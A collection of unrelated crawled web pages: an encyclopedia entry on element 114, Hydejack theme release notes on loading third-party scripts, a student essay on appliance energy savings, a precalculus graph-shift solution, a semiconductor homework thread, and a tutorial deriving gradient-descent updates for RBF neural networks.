Electrons per shell 2, 8, 18, 32, 32, 18, 4
Phase presumably a solid
CAS registry number 54085-16-4
Selected isotopes
iso NA half-life DM DE (MeV) DP
288Uuq syn 2.8 s
References
Ununquadium (pronounced /juːnənˈkwɒdiəm/), or eka-lead, is the temporary name of a radioactive chemical element in the periodic table that has the temporary symbol Uuq and has the atomic number 114.
## History
The discovery of ununquadium in December 1998 was reported in January 1999 by scientists at Dubna (Joint Institute for Nuclear Research) in Russia.[1] The same team produced another isotope of Uuq three months later[2] and confirmed the synthesis in 2004 and 2006.
In 2004 in the Joint Institute for Nuclear Research the synthesis of this element was confirmed by another method (the chemical identifying on final products of decay of element).
Ununquadium is a temporary IUPAC systematic element name. Some have termed it eka-lead, as its properties are conjectured to be similar to those of lead. It is expected to be a soft, dense metal that tarnishes in air, with a melting point around 200 degrees Celsius.
## Synthesis
Ununquadium can be synthesized by bombarding plutonium-242 and 244 targets with calcium-48 heavy ion beams, such as in
$\,^{242}_{94}\mathrm{Pu} + \,^{48}_{20}\mathrm{Ca} \, \to \,^{287}_{114}\mathrm{Uuq} + 3 \; ^1_0\mathrm{n} \;$
$\,^{244}_{94}\mathrm{Pu} + \,^{48}_{20}\mathrm{Ca} \, \to \,^{289}_{114}\mathrm{Uuq} + 3 \; ^1_0\mathrm{n} \;$
## In search for the island of stability - ununquadium-298
According to the island of stability theory, some nuclides around the area of 114 protons and 184 neutrons (i.e. isotope Uuq-298) can be expected to be relatively stable in comparison to the surrounding nuclides. Ununquadium does not occur naturally, so it is entirely synthesized in laboratories. All isotopes of ununquadium synthesized so far are neutron-poor. This means that they contain significantly fewer neutrons than 184, which is one of the magic number of neutrons that is believed to make the isotope more stable. Neutron-poor also indicates that the isotopes decay either by spontaneous fission producing a variety of radionuclides, positron emission or electron capture to yield element ununtrium. So far, all three that have been made have undergone spontaneous fission in the first .0012 milliseconds, and therefore have never been able to be studied.
### Difficulty in synthesis
Manufacturing ununquadium-298 would be very difficult, because nuclei summing to 114 protons and 184 neutrons are not available in weighable quantities.
However it may be possible to generate ununquadium-298, if nuclear transfer reactions can be achieved.[citation needed] One of these reactions may be
$\,^{204}_{80}\mathrm{Hg} + \,^{136}_{54}\mathrm{Xe} \, \to \,^{298}_{114}\mathrm{Uuq} + \,^{40}_{20}\mathrm{Ca} + 2 \; ^1_0\mathrm{n} \;$ | 2014-04-25 04:13:30 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 3, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.474221795797348, "perplexity": 3649.5799810850954}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-15/segments/1398223207985.17/warc/CC-MAIN-20140423032007-00527-ip-10-147-4-33.ec2.internal.warc.gz"} |
https://pestefo.github.io/examples-posts/2017-06-06-third-party-scripts/ | # Third Party Scripts (v6.3)
This release makes including third party plugins easier. Until now, the push state approach to loading new pages has been interfering with embedded script tags. This version changes this by simulating the sequential loading of script tags on a fresh page load. This approach should work in a majority of cases, but can still cause problems with scripts that can't be added more than once per page. If an issue can't be resolved, there's now the option to disable push state by setting disable_push_state: true in config.yml. ## What's happening? The problem is as follows: When the browser encounters a script tag while parsing a HTML page it will stop (possibly to make a request to fetch an external script) and then execute the code before continuing parsing the page (it's easy to how this can make your page really slow, but that's a different topic). In any case, due of this behavior you can do things like include jQuery, then run code that depends on jQuery in the next script tag: ~~~html ~~~ I'd consider this an anti-pattern for the reason mentioned above, but it remains common and has the advantage of being easy to understand. However, things break when Hydejack dynamically inserts new content into the page. It works fine for standard markdown content like p tags, but when inserting script tags the browser will execute them immediately and in parallel, because in most cases this is what you'd want. However, this means that $('#tabs').someJQueryFunction(); will run while the HTTP request for jQuery is still in progress --- and we get an error that $ isn't defined, or similar. From this description the solution should be obvious: Insert the script tags one-by-one, to simulate how they would get executed if it was a fresh page request. In fact this is how Hydejack is now handling things (and thanks to rxjs' concatMap it was easy to implement), but unfortunately this is not a magic solution that can fix all problems: * Some scripts may throw when running on the same page twice * Some scripts rely on the document's load event, which has fired long before the script was inserted * unkown-unkowns But what will "magically" solve all third party script problems, is disabling dynamic page loading altogether, for which there's now an option. To make this a slightly less bitter pill to swallow, there's now a CSS-only "intro" animation that looks similar to the dynamic one. Maybe you won't even notice the difference. ## Patch Notes ### Minor * Support embedding script tags in markdown content * Add disable_push_state option to _config.yml * Add disable_drawer option to _config.yml * Rename syntax highlighting file to syntax.scss * Added [chapter on third party scripts][scripts] to documentation ### Design * Add subtle intro animation * Rename "Check out X for more" to "See X for more" on welcome\* page * Replace "»" with "→" in "read more"-type of links ### Fixes * Fix default color in gem-based theme [scripts]: https://qwtel.com/hydejack/docs/scripts/
Powered by Hydejack v6.6.1 | 2019-02-17 11:36:14 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.22833743691444397, "perplexity": 3295.2668149793567}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-09/segments/1550247481992.39/warc/CC-MAIN-20190217111746-20190217133746-00609.warc.gz"} |
https://sites.psu.edu/math033spring16/2016/04/16/appliances-and-energy/ | # Appliances and Energy
As a college senior, I am starting to research the “real world”. Which essentially means that I am looking at a lot of things that cost a lot of money. A way to save money (and electricity) is by buying newer appliances when stocking your home. And while that might seem like a rather consumerist statement, appliances are a major drain of electricity. And the older they are, the less efficient they are. It is recommended that people replace their refrigerators every 15 years. What many people don’t realize is that 15 years is too long. You shouldn’t wait for the very last second to replace your appliances because more efficient products will have been put on the market in the meantime. Also, a 15 year old fridge is not nearly as efficient as a 3 year old fridge.
I want to compare new eco-friendly efficient models of appliances with their older counterparts. I think a lot of people have heard the common ways to reduce your electricity needs (by shutting off the lights when you are done with them or not cranking the a/c), but sometimes the only way to see true savings in both electricity/water usage is to buy newer models. This information is useful for people who are buying homes for the first time, those looking to renovate, those managing properties, and those renting them out. Also, this is good for businesses because they have capital available to make investments that might not pay off completely for a few years.
If you are researching appliance one phrase will keep popping up and that is “Energy Star.” Energy Star is not a brand, rather a program run by the Environmental Protection Agency that identifies brands that are efficient and reduce pollution. Products that have the Energy Star are ones that are very efficient. In fact, they exceed the current governmental goals for efficiency. In terms of energy, they go above and beyond what is required. For example according to The Dept of Energy, Energy Star refrigerators uses 40% less energy than standard models made in 2001. This does not only apply to fridges; dishwashers are a major drain of both electricity and water. According to the Home Water Works, the older units use between 12 and 15 gallons of water per cycle. Energy Star dishwashers save 3 times the water compared to an older model.
Pre 1994 Dishwashers
$4\text{ Runs}\times12.5\text{ Gallons}=50\text{ Gallons per Week}$
Energy Star Dishwashers
$4\text{ Runs}\times4.25\text{ Gallons}\approx17\text{ Gallons per Week}$
Comparison
$50\text{ Gallons}\div17\text{ Gallons}\approx{3}$
The National Resources Defense Council has a lot of information about appliance replacement and energy savings. For example, one of the interesting ways to reduce your electric bill is to replace your water heater. New homeowners often don’t consider this when buying, but if they are more than 10 years old they can be less that 50% efficient. Also, if you replace a washing machine made before 1994 with an energy star model is can save a family $110 per year. They use 50% less energy and approximately 17 less gallons of water to run. As you can see below, the total amount of money normally spent on the appliance electricity is$247 dollars. Using the Energy Star washers will bring that down to $137. So there was a significant reduction in the total bill due to that one appliance being upgraded ($1950 compared to $2060 a year). Amount of money spent on appliances: $2060\times0.12\approx{247}$ Amount of money spent when you use the newer washer: $247\text{ – }110=137$ The rest of the electric bill: $2060\times0.88\approx1813$ The total electric bill with the new washing machine: $1813\text{ + }137=1950$ The average US household spends a lot of money on energy and electricity. According to Energy Star the bill usually totals around$2,060. 13% going towards water heating, 13% for cooling, 12% for appliances, 12% for lighting, 21% for electronics, and 29% for heating. Let’s say that my neighbors house is 17 years old and they’ve never replaced the appliances. If they were to just replace their water heater, they would save about $134 per year. Water heaters can become 50% less efficient as they get older, meaning, they have to be run for twice as long to garner the same results. If the neighbors replaced theirs, it would cut the cost of their bill (the portion for water heating) in half. $2060\times0.13\approx{268}$ $268\div2=134$ A visual representation of the electric bill Also, according to National Resources Defense Council , if they were to also replace their air conditioning unit, they would save an additional$14 dollars.
$2060\text{ – }134\text{ – }14\approx1912$
In conclusion, buying new appliances is spending money to save money. If you were raised in a household where the motto “If it ain’t broke, don’t fix it” was commonly said, it is time to reevaluate. The bottom line is that replacing your aging appliances is better for you in the long run. As you can see from the calculations above, it really is better for your wallet, and better for the environment to buy Energy Star rated products.
Sources:
My first source is Dept of Energy . This is a credible sources because it is published by the United States government.
My second source is The Natural Resources Defense Council . This is a credible source because it is an organization that is dedicated to reducing unnecessary resource usage. It is a website that has a lot of empirical data for a variety of products (fridge, washer, etc).
My third source is Energy Star . This source is credible because it is published by the EPA which is the Environmental Protection Agency which is a federal agency.
My fourth source is Home Water Works . This source is credible because it is a project of the Alliance for Water Efficiency which is an organization that collects information to advocate for the conservation of resources. Also, it was updated in 2016 which means all of the information is as accurate as possible.
This entry was posted in Student Writing. Bookmark the permalink. | 2020-02-27 03:01:36 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.22367224097251892, "perplexity": 1369.6787979031562}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-10/segments/1581875146643.49/warc/CC-MAIN-20200227002351-20200227032351-00537.warc.gz"} |
https://www.gradesaver.com/textbooks/math/precalculus/precalculus-10th-edition/chapter-3-linear-and-quadratic-functions-3-2-building-linear-models-from-data-3-2-assess-your-understanding-page-136/30 | ## Precalculus (10th Edition)
$f(x)=(x+3)^2-4$.
RECALL: (1) The graph of $y=f(x-h)$ involves a horizontal shift of $|h|$ units (to the right when $h \gt 0$, to the left when $h\lt0$) of the parent function $f(x)$. (2) The graph of $y=f(x)+k$ involves a vertical shift of $|k|$ units (upward when $k \gt 0$, downward when $k\lt0$) of the parent function $f(x)$. (3) The graph of $y=a \cdot f(x-h)$ involves a vertical stretch or compression (stretch when $a\gt1$, compression when $0\lt a \lt1$) of the parent function $f(x)$. (4) The graph of $y=-f(x)$ involves a reflection about the $x$-axis of the parent function $f(x)$. Use the rules listed above to find the equation of the given graph. (1) Shifting the graph horizontally $3$ units to the left (Rule (1) above) makes the equation of the resulting function $y=f(x)=(x+3)^2$. (2) Shifting the graph horizontally $4$ units down (Rule (2) above) makes the equation of the resulting function $y=f(x)=(x+3)^2-4$. | 2021-10-28 03:00:08 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8599321842193604, "perplexity": 280.9607483121159}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323588246.79/warc/CC-MAIN-20211028003812-20211028033812-00232.warc.gz"} |
https://www.physicsforums.com/threads/homework-in-solid-state-material.526640/ | # Homework in Solid state material
1. Sep 2, 2011
### Blond Arrow
Here is the problem:
The electron concentration in a region of silicon depends linearly on depth with concentration of 5x10^15 cm^-3 at surface (x=0) and 10^15 cm^-3 at depth of x=500nm. If the vertical electron current density in this region is constant at Jn=100 A/cm^2, calculate the electric field near x=500nm. assume that the mobility is constant at 1250cm^2/Vs.
If anyone can at least explain the meaning of each value written in the problem and the formula that can be used to solve this problem ..
Thank you...
2. Sep 5, 2011
### Blond Arrow
No one know???
3. Sep 5, 2011
### uart
The equation that you need is for the total electron current density (drift plus diffusion).
$$J_n = q D_n \frac{dn}{dx} + q \mu_n E$$
q = 1.6E-19
D_n = (kT/q) u_n which is approx 0.026 u_n at room temperature.
Since you know J_n and dn/dx then E is the only unknown. | 2018-01-21 17:17:08 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.727839469909668, "perplexity": 3632.230982014396}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084890795.64/warc/CC-MAIN-20180121155718-20180121175718-00200.warc.gz"} |
http://www.varunshankar.com/blog/2018/3/26/rbf-nn-for-function-approximation-part-2-training | # RBF-NN for Function Approximation: Part 2 (Training)
In the previous post (RBF-NN: Part 1), I discussed the use of RBF Neural Networks (RBF-NN) for function approximation. In that post, we set up an RBF-NN of the form: $$s({\bf x}) = \sum\limits_{k=1}^n c_k \phi\left(\epsilon_k,\|{\bf x} - {\bf x}^c_k\|\right) + \sum\limits_{j=1}^{{\ell+d \choose d}} \lambda_j p_j({\bf x}),$$ where $$\phi(\epsilon,r)$$ is a Radial Basis Function (RBF), $$p_j({\bf x})$$ are the monomials in $$d$$ dimensions (up to degree $$\ell$$), $$c_k$$ are the NN weights, and $$\epsilon_k$$ are shape parameters. In the last post, we saw how to solve for the $$c_k$$ values (together with the $$\lambda_j$$ values). Today, we'll focus on training the different parameters in the RBF-NN. More specifically, we will discuss how to train the parameters $$c_k$$, $$\epsilon_k$$, and $${\bf x}^c_k$$. The $$\lambda_j$$ parameters do not need to be trained separately, and can be computed from the other parameters. For the following discussion, remember that we have $$N$$ data sites $$X = \{{\bf x}_i\}_{i=1}^N$$ (which are the locations of our training data), and $$n$$ centers $$X_c = \{{\bf x}^c_k\}_{k=1}^n$$ (which are the locations of each neuron''). We assume for now that we are given $$N$$, $$n$$, and $$\ell$$ (polynomial degree).
## Training via Gradient Descent (Theory)
Before we begin, we must ask ourselves what training'' is. The idea is to use the sampled function values $$f({\bf x}_k)$$ at the given data sites $$X$$ to teach the neural network $$s({\bf x})$$ about $$f$$. Formally speaking, we want the error on the training set $$X$$ to be minimized. We also have a more important goal that we will discuss in a subsequent post: how to generalize the RBF-NN so that the error on a test set (distinct from the training set) is also kept low.
We said we want to minimize the training error. Before we talk about how to do that, we need to define this error. There are a few different ways to do so. We will use a simple measure of error called mean-squared error $$E$$. We can define this error at the data sites as: $$E = \frac{1}{N} \sum\limits_{i=1}^N \left( f\left({\bf x}_i\right) - s\left({\bf x}_i\right) \right)^2.$$ For the purposes of training, it is useful to think of $$E$$ and $$s$$ as explicit functions of the different training parameters. Thus, we write $$E$$ as: $$E\left(c_1,\ldots,c_n,\epsilon_1,\ldots,\epsilon_n,{\bf x}^c_1,\ldots,{\bf x}^c_n\right) = \frac{1}{N} \sum\limits_{i=1}^N \left( f\left({\bf x}_i\right) - s\left({\bf x}_i,c_1,\ldots,c_n,\epsilon_1,\ldots,\epsilon_n,{\bf x}^c_1,\ldots,{\bf x}^c_n\right) \right)^2.$$ Phew! That's tedious, but it tells us exactly what RBF-NN parameters $$E$$ and $$s$$ depend on. It also reminds us that the true function $$f$$ most certainly does not depend on the RBF-NN parameters. Okay, now that we've written down the error, we have to discuss how to minimize it. Obviously, E is a function of many RBF-NN parameters. Ideally, we'd like to find the minimum value of E corresponding to all these parameters. More precisely, we wish to minimize E with respect to the RBF-NN parameters.
From calculus, recall that to find the minimum of a function, you take its derivative and set it to zero. Let's see how to minimize $$E$$ with respect to just $$c_1$$. First, remember that $$E$$ is a function of many variables. Thus, when differentiating $$E$$ with respect to $$c_1$$, you need its partial derivative with respect to $$c_1$$. Setting this derivative to zero, we get \begin{align} \implies \frac{1}{N} \frac{\partial}{\partial c_1} \sum\limits_{i=1}^N \left(f\left({\bf x}_i\right) - s\left({\bf x}_i,c_1,\ldots,c_n,\epsilon_1,\ldots,\epsilon_n,{\bf x}^c_1,\ldots,{\bf x}^c_n\right) \right)^2 &=0, \\\\ \implies \frac{1}{N} \sum\limits_{i=1}^N \frac{\partial}{\partial c_1}\left(f\left({\bf x}_i\right) - s\left({\bf x}_i,c_1,\ldots,c_n,\epsilon_1,\ldots,\epsilon_n,{\bf x}^c_1,\ldots,{\bf x}^c_n\right)\right)^2 &=0. \end{align} For convenience, let $$e_i = f\left({\bf x}_i\right) - s\left({\bf x}_i,c_1,\ldots,c_n,\epsilon_1,\ldots,\epsilon_n,{\bf x}^c_1,\ldots,{\bf x}^c_n\right),$$ so that the long expression above becomes: $$\frac{1}{N} \sum\limits_{i=1}^N \frac{\partial}{\partial c_1}e_i^2 =0.$$ Differentiating the above expression with the chain rule, we get $$\frac{1}{N} \sum\limits_{i=1}^N 2e_i \frac{\partial e_i}{\partial c_1} =0.$$ It is clear that the above procedure works for all the parameters $$c_1,\ldots,c_n,\ldots$$. In general, all we have to do is compute the partial derivative of $$e_i$$ with respect to a parameter, and we can find the minimum (in priniciple). Let's continue doing this for $$c_1$$. Focusing on that partial derivative, we have $$\frac{\partial e_i}{\partial c_1} = \frac{\partial}{\partial c_1} \left(f\left({\bf x}_i\right) - s\left({\bf x}_i,c_1,\ldots,c_n,\epsilon_1,\ldots,\epsilon_n,{\bf x}^c_1,\ldots,{\bf x}^c_n\right) \right).$$ Again, writing out all the parameters came in handy. We know that $$f$$ is not a function of any RBF-NN parameters. Therefore, we have $$\frac{\partial e_i}{\partial c_1} = -\frac{\partial}{\partial c_1}s\left({\bf x}_i,c_1,\ldots,c_n,\epsilon_1,\ldots,\epsilon_n,{\bf x}^c_1,\ldots,{\bf x}^c_n\right).$$ Great! This in principle can be computed for the RBF-NN for each parameter. All we have to do is set the derivative to zero, solve for the parameters $$c_1,\ldots,c_n,\ldots$$, and we're good to go! Right? In theory, yes. In practice, it is incredibly difficult to actually solve for the parameters by minimizing $$E$$ with respect to those parameters. This is where the idea of gradient descent comes in.
The procedure of setting the partial derivative of $$E$$ to zero is too tedious to be feasible. Gradient descent offers a compromise: instead of jumping to $$\frac{\partial E}{\partial c_1} = 0$$ in one shot as detailed above, how about we descend there gradually? Gradient descent for the parameter $$c_1$$ therefore amounts to an update rule of the form: $$c_1^{new} = c_1^{old} - \eta_{c_1} \frac{\partial E}{\partial c_1},$$ where $$0 < \eta_{c_1} < 1$$ is called the "learning rate". It controls the "speed" at which $$c_1^{new}$$ approaches the value $$c_1^*$$, where $$c_1^*$$ is the value of $$c_1$$ that you would've gotten if you had been able to minimize E. If you run gradient descent long enough, it is guaranteed to converge to the minimum. In other words, if you ran a really large number of iterations of gradient descent, you will be guaranteed to minimize $$E$$. In practice, you run it until $$E$$ hits a predefined threshold/tolerance or for a certain number of iterations, stop the gradient descent, and live with what you get.
## Training $$c_1,\ldots,c_n$$ via Gradient Descent
We will now derive the formulas for training each of the RBF-NN parameters using gradient descent. Recall that there are three types of parameters: the $$c$$ parameters, the $$\epsilon$$ parameters, and the $${\bf x}^c$$ parameters. We will need to compute partial derivatives for each of these cases. We'd sort of gotten started with $$c_1$$, so let's keep going with that. Gradient descent gives us: $$c_1^{new} = c_1^{old} - \eta_{c_1} \frac{\partial E}{\partial c_1}.$$ From our previous derivation above, we know this is the same as $$c_1^{new} = c_1^{old} - \eta_{c_1} \frac{1}{N}\sum\limits_{i=1}^N2e_i\frac{\partial e_i}{\partial c_1},$$ where $$\frac{\partial e_i}{\partial c_1} = -\frac{\partial}{\partial c_1}s\left({\bf x}_i,c_1,\ldots,c_n,\epsilon_1,\ldots,\epsilon_n,{\bf x}^c_1,\ldots,{\bf x}^c_n\right).$$ Plugging in the definition of $$s$$, we have $$\frac{\partial e_i}{\partial c_1} = -\frac{\partial}{\partial c_1} \left(\sum\limits_{k=1}^n c_k \phi\left(\epsilon_k,\|{\bf x}_i - {\bf x}^c_k\|\right) + \sum\limits_{j=1}^{{\ell+d \choose d}} \lambda_j p_j({\bf x}_i) \right).$$ Plunging forward bravely, this gives us $$\frac{\partial e_i}{\partial c_1} = -\frac{\partial}{\partial c_1}\sum\limits_{k=1}^n c_k \phi\left(\epsilon_k,\|{\bf x}_i - {\bf x}^c_k\|\right) - \frac{\partial}{\partial c_1}\sum\limits_{j=1}^{{\ell+d \choose d}} \lambda_j p_j({\bf x}_i).$$ The second term vanishes since it doesn't depend on $$c_1$$. This leaves the first term: $$\frac{\partial e_i}{\partial c_1} = -\frac{\partial}{\partial c_1}\sum\limits_{k=1}^n c_k \phi\left(\epsilon_k,\|{\bf x}_i - {\bf x}^c_k\|\right).$$ To help us do this derivative, we will expand the summand: $$\frac{\partial e_i}{\partial c_1} = -\frac{\partial}{\partial c_1}\left(c_1 \phi\left(\epsilon_1,\|{\bf x}_i - {\bf x}^c_1\|\right) + c_2\phi\left(\epsilon_2,\|{\bf x}_i - {\bf x}^c_2\|\right)+ \ldots + c_n\phi\left(\epsilon_n,\|{\bf x}_i - {\bf x}^c_n\|\right) \right).$$ Wait a minute-- clearly, only the first term in the summand is a function of $$c_1$$. Then, the derivatives of the other terms vanish, leaving us with: $$\frac{\partial e_i}{\partial c_1} = -\frac{\partial}{\partial c_1}c_1 \phi\left(\epsilon_1,\|{\bf x}_i - {\bf x}^c_1\|\right).$$ This is a very straightforward derivative to do, giving us $$\frac{\partial e_i}{\partial c_1} = -\phi\left(\epsilon_1,\|{\bf x}_i - {\bf x}^c_1\|\right).$$ In general, for any $$c_k$$, by analogy, we therefore have $$\frac{\partial e_i}{\partial c_k} = -\phi\left(\epsilon_k,\|{\bf x}_i - {\bf x}^c_k\|\right).$$ The gradient descent rule for the $$n$$ $$c$$ values then looks like: $$c_k^{new} = c_k^{old} + \eta_{c_k} \frac{1}{N}\sum\limits_{i=1}^N 2e_i \phi\left(\epsilon_k,\|{\bf x}_i - {\bf x}^c_k\|\right), k=1,\ldots,n.$$
## Training $$\epsilon_1,\ldots,\epsilon_n$$ via Gradient Descent
Having seen things in detail for the $$c_k$$ values, we can skip a few steps to find the gradient descent formula for the $$\epsilon_k$$. We know that we need $$\frac{\partial e_i}{\partial \epsilon_1} = -\frac{\partial}{\partial \epsilon_1}\sum\limits_{k=1}^n c_k \phi\left(\epsilon_k,\|{\bf x}_i - {\bf x}^c_k\|\right) - \frac{\partial}{\partial \epsilon_1}\sum\limits_{j=1}^{{\ell+d \choose d}} \lambda_j p_j({\bf x}_i).$$ Once again, the second term drops out, leave us with $$\frac{\partial e_i}{\partial \epsilon_1} = -\frac{\partial}{\partial \epsilon_1}\left(c_1 \phi\left(\epsilon_1,\|{\bf x}_i - {\bf x}^c_1\|\right) + c_2\phi\left(\epsilon_2,\|{\bf x}_i - {\bf x}^c_2\|\right)+ \ldots + c_n\phi\left(\epsilon_n,\|{\bf x}_i - {\bf x}^c_n\|\right) \right).$$ Only the first term in the summand is a function of $$\epsilon_1$$. This gives us $$\frac{\partial e_i}{\partial \epsilon_1} = -\frac{\partial}{\partial \epsilon_1} c_1 \phi\left(\epsilon_1,\|{\bf x}_i - {\bf x}^c_1\|\right) = - c_1\frac{\partial}{\partial \epsilon_1} \phi\left(\epsilon_1,\|{\bf x}_i - {\bf x}^c_1\|\right).$$ Here, we've made an assumption that the weights $$c_k$$ are not a function of the values $$\epsilon_k$$. This assumption is interesting, and a topic of ongoing research. Let's leave that alone for now and proceed with the update rule above. In general, we have $$\frac{\partial e_i}{\partial \epsilon_k} = - c_k\frac{\partial}{\partial \epsilon_k} \phi\left(\epsilon_k,\|{\bf x}_i - {\bf x}^c_k\|\right),$$ with the corresponding gradient descent rule: $$\epsilon_k^{new} = \epsilon_k^{old} + \eta_{\epsilon_k} \frac{1}{N}\sum\limits_{i=1}^N 2e_i c_k\frac{\partial}{\partial \epsilon_k} \phi\left(\epsilon_k,\|{\bf x}_i - {\bf x}^c_k\|\right), k=1,\ldots,n.$$ We've left that last partial derivative fairly generic, so that the process is applicable to any RBF.
## Training $${\bf x}^c_1,\ldots,{\bf x}^c_n$$ via Gradient Descent
Now, we come to the final part of this post: training the RBF-NN centers using gradient descent. This is fun, because here we're actually coming up with an update rule to move points around in space! As usual, let's do everything for $${\bf x}^c_1$$. We require the quantity $$\frac{\partial e_i}{\partial {\bf x}^c_1} = -\frac{\partial }{\partial {\bf x}^c_1} s\left({\bf x}_i,{\bf x}^c_1,\ldots,{\bf x}^c_n \right),$$ where we've suppressed other arguments to $$s$$ for clarity. Noting immediately that the polynomial part of $$s$$ does not depend on $${\bf x}^c$$, we get $$\frac{\partial e_i}{\partial {\bf x}^c_1} = -\frac{\partial }{\partial {\bf x}^c_1} \sum\limits_{k=1}^n c_k \phi\left(\epsilon_k, \|{\bf x}_i - {\bf x}^c_k\|\right).$$ Just as in the previous derivations, this is immediately simplified. Only the first RBF depends on $${\bf x}^c_1$$, making the others vanish on differentiation. This yields $$\frac{\partial e_i}{\partial {\bf x}^c_1} = -\frac{\partial }{\partial {\bf x}^c_1} c_1 \phi\left(\epsilon_1, \|{\bf x}_i - {\bf x}^c_1\|\right) = -c_1 \frac{\partial }{\partial {\bf x}^c_1}\phi\left(\epsilon_1, \|{\bf x}_i - {\bf x}^c_1\|\right).$$ We can further simplify the last term using the chain rule. $$\phi(r)$$ is a radial function, and $$r = \|{\bf x} - {\bf x}^c\|$$. The chain rule gives: $$\frac{\partial e_i}{\partial {\bf x}^c_1} = -c_1 \left.\left(\frac{\partial \phi }{\partial r} \frac{\partial r}{\partial {\bf x}^c}\right)\right|_{{\bf x}^c = {\bf x}^c_1}.$$ This simplifies to $$\frac{\partial e_i}{\partial {\bf x}^c_1} = c_1 \left.\frac{\partial \phi}{\partial r}\right|_{r = r_1} \frac{{\bf x}_i - {\bf x}^c_1}{r_1},$$ where $$r_1 = \|{\bf x}_i - {\bf x}^c_1\|$$. To reduce the number of operations, it's useful to rewrite this as: $$\frac{\partial e_i}{\partial {\bf x}^c_1} = c_1 \left.\left(\frac{1}{r}\frac{\partial \phi}{\partial r}\right)\right|_{r = r_1} {\bf x}_i - {\bf x}^c_1.$$ The quantity in parenthesis can be computed analytically, then evaluated at $$r = r_1$$ for any RBF. The general expression for any center $${\bf x}^c_k$$ is: $$\frac{\partial e_i}{\partial {\bf x}^c_k} = c_k \left.\left(\frac{1}{r}\frac{\partial \phi}{\partial r}\right)\right|_{r = r_k} {\bf x}_i - {\bf x}^c_k.$$ Finally, the gradient descent rule for the centers is: $$\left({\bf x}^c_k\right)^{new} = \left({\bf x}^c_k\right)^{old} - {\bf \eta}_{{\bf x}^c_k} \frac{1}{N}\sum\limits_{i=1}^N e_i c_k \left.\left(\frac{1}{r}\frac{\partial \phi}{\partial r}\right)\right|_{r = r_k} {\bf x}_i - {\bf x}^c_k, k=1,\ldots, n.$$
## Wrapping up
